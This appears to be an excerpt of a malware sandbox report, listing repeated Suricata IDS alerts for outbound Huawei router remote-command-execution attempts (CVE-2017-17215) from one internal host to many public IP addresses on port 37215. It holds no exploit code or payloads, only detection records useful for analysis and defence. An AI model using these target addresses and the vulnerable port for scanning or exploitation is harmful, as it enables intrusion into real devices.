      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53858 -> 197.207.252.24:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41652 -> 41.175.156.36:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34896 -> 150.160.43.43:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50710 -> 74.75.42.123:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56934 -> 197.76.102.66:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40308 -> 157.146.60.108:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57318 -> 41.13.36.56:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52804 -> 157.113.51.217:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55096 -> 206.8.170.73:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34730 -> 197.229.218.46:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55162 -> 118.18.22.69:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36640 -> 197.19.52.193:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37390 -> 155.185.231.58:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37444 -> 162.135.92.55:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57728 -> 198.207.103.66:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40510 -> 41.186.115.33:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60728 -> 157.123.146.86:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39960 -> 41.131.177.29:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43884 -> 41.60.76.75:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58790 -> 79.17.7.148:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45782 -> 41.30.49.154:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50922 -> 157.55.214.36:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55870 -> 197.78.118.157:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47980 -> 157.79.211.188:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34414 -> 157.120.97.200:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57786 -> 142.69.242.218:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57828 -> 156.177.200.47:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58640 -> 157.205.47.109:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50122 -> 196.74.57.171:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42584 -> 41.109.249.107:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44526 -> 157.1.197.151:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57082 -> 41.173.123.151:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59360 -> 41.13.210.108:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44914 -> 41.7.244.217:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59152 -> 217.57.205.252:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42756 -> 47.251.214.122:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57366 -> 41.70.65.131:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47414 -> 197.201.37.174:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55630 -> 80.37.224.97:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52392 -> 190.82.141.39:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41836 -> 197.207.107.219:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33156 -> 197.236.240.201:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33944 -> 157.165.116.51:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40792 -> 41.160.229.2:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50506 -> 197.191.38.151:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44002 -> 41.53.239.76:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52894 -> 57.234.180.255:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:32908 -> 157.60.56.146:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56168 -> 172.206.47.242:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53496 -> 65.97.145.229:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50390 -> 41.127.173.222:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47448 -> 41.156.178.200:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54374 -> 157.42.97.91:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36806 -> 41.219.235.29:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60094 -> 197.57.176.204:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48530 -> 41.17.58.79:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47520 -> 173.225.32.7:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54472 -> 157.60.233.254:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33396 -> 121.134.165.173:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56412 -> 157.22.57.252:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46632 -> 197.186.8.76:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56844 -> 41.54.146.162:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55606 -> 41.134.53.54:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47124 -> 41.179.90.220:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50256 -> 157.48.241.143:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58782 -> 38.12.101.35:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52476 -> 41.67.141.35:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34404 -> 157.158.165.69:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49346 -> 41.168.115.94:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49032 -> 157.222.240.189:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54138 -> 197.169.235.91:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34442 -> 41.203.47.172:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56552 -> 41.119.119.84:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45014 -> 67.62.43.68:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48236 -> 157.200.61.194:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33004 -> 71.66.178.65:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58702 -> 41.195.85.193:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41846 -> 41.250.137.140:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38122 -> 157.119.42.25:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36948 -> 157.135.215.249:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49190 -> 49.215.198.186:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34910 -> 41.177.70.151:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33038 -> 197.183.209.6:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51238 -> 197.194.107.107:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48926 -> 41.99.76.13:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40928 -> 41.75.87.215:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34226 -> 157.174.150.155:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55092 -> 157.26.131.119:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52542 -> 197.20.66.179:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49448 -> 41.93.247.160:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33462 -> 142.158.156.88:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55558 -> 217.152.91.151:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58858 -> 157.225.176.52:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48712 -> 197.158.224.109:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48616 -> 85.56.18.163:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58516 -> 157.235.243.102:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34510 -> 41.224.221.200:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38804 -> 197.6.118.59:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34576 -> 74.217.70.12:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53944 -> 103.37.241.209:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41558 -> 197.151.146.94:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46326 -> 41.205.16.192:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47444 -> 197.230.205.123:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53614 -> 2.21.32.88:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58622 -> 157.241.177.108:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42548 -> 197.78.175.84:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57116 -> 157.45.241.116:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57290 -> 157.106.56.23:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36872 -> 157.100.130.36:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54868 -> 14.98.172.123:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50384 -> 197.217.102.111:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:32910 -> 157.204.33.242:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37312 -> 41.253.201.18:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36844 -> 78.64.73.67:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47886 -> 157.54.58.231:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47702 -> 197.196.251.7:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57146 -> 41.141.136.234:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59848 -> 157.55.7.70:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39378 -> 41.77.97.139:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35180 -> 157.122.225.206:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56568 -> 41.232.70.128:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58338 -> 197.37.65.199:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45576 -> 176.244.244.201:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57054 -> 157.237.20.45:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45616 -> 41.22.74.235:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58296 -> 157.238.180.229:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42494 -> 41.253.31.166:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45920 -> 169.146.85.244:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40698 -> 197.32.108.66:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54012 -> 157.121.237.194:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44002 -> 41.28.76.63:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43218 -> 157.188.72.107:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47422 -> 18.6.130.197:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40914 -> 197.81.39.134:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39100 -> 41.132.145.25:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53132 -> 41.204.209.96:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39408 -> 69.27.253.230:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58894 -> 157.100.208.166:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37340 -> 197.36.219.145:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53466 -> 157.91.7.199:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46064 -> 160.238.190.138:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42730 -> 197.76.53.152:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53420 -> 41.161.255.87:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53338 -> 197.180.30.103:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36618 -> 157.129.40.236:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40504 -> 157.107.67.119:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42754 -> 41.254.170.132:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53152 -> 41.31.88.226:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39880 -> 197.147.80.65:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38506 -> 197.84.149.63:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56108 -> 151.175.224.54:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44606 -> 152.16.16.146:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49692 -> 155.63.54.195:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53234 -> 183.114.213.108:37215
